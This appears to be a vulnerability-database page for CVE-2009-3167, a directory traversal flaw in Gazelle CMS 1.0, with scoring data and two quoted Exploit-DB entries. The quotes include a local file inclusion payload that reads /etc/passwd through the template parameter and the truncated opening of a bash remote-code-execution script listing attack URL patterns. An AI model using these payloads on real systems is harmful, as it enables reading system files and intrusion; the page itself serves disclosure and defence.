CVE-2009-3167
published 2009-09-11CVE-2009-3167: Directory traversal vulnerability in index.php in Anantasoft Gazelle CMS 1.0, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary…
PriorityP429medium4.3CVSS 2.0
AVNACMAuNCPINAN
EXPLOIT
EPSS
2.35%
81.6th percentile
Directory traversal vulnerability in index.php in Anantasoft Gazelle CMS 1.0, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the template parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| anantasoft | gazelle_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Gazelle CMS 1.0 - Multiple Vulnerabilities / Remote Code Execution
exploitdb·2009-08-12
CVE-2009-3182 Gazelle CMS 1.0 - Multiple Vulnerabilities / Remote Code Execution
Gazelle CMS 1.0 - Multiple Vulnerabilities / Remote Code Execution
---
#!/bin/bash
# Gazelle CMS 1.0 Multiple Vulnerabilities
# Script Download: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download
# Found by white_sheep on 11/08/2009
# Contact: [email protected] - https://www.ihteam.net
# Need magic_quote_gpc Off for RCE and LFI
# Thanks to r00t
#
# PASSWORD RESET:
# http://localhost/gazelle/renew.php?user=[username]
#
# LFI:
# author: fuzion (milw0rm.com/author/1343)
# http://localhost/gazelle/index.php?template=[LFI]
#
# XSS:
# http://localhost/gazelle/user.php?user=[XSS]
# http://localhost/gazelle/search.php?lookup=[CODE]
#
# RCE:
echo
echo "###############################################"
echo "# GazelleCMS 1.0 RCE #"
echo "# by white_sheep #"
echo "# sheewhite[at]googl
Exploit-DB
Gazelle CMS 1.0 - 'template' Local File Inclusion
exploitdb·2009-01-28
CVE-2009-3167 Gazelle CMS 1.0 - 'template' Local File Inclusion
Gazelle CMS 1.0 - 'template' Local File Inclusion
---
Gazelle CMS Local File Inclusion
http://www.anantasoft.com/
/gazelle/?template=../../../../../../../../../../../../etc/passwd%00 (view source)
Author notified: Jan 20
http://nukeit.org
# milw0rm.com [2009-01-28]
No writeups or analysis indexed.
http://secunia.com/advisories/33686http://www.exploit-db.com/exploits/7895http://www.exploit-db.com/exploits/9425http://www.securityfocus.com/bid/33483http://secunia.com/advisories/33686http://www.exploit-db.com/exploits/7895http://www.exploit-db.com/exploits/9425http://www.securityfocus.com/bid/33483
2009-09-11
Published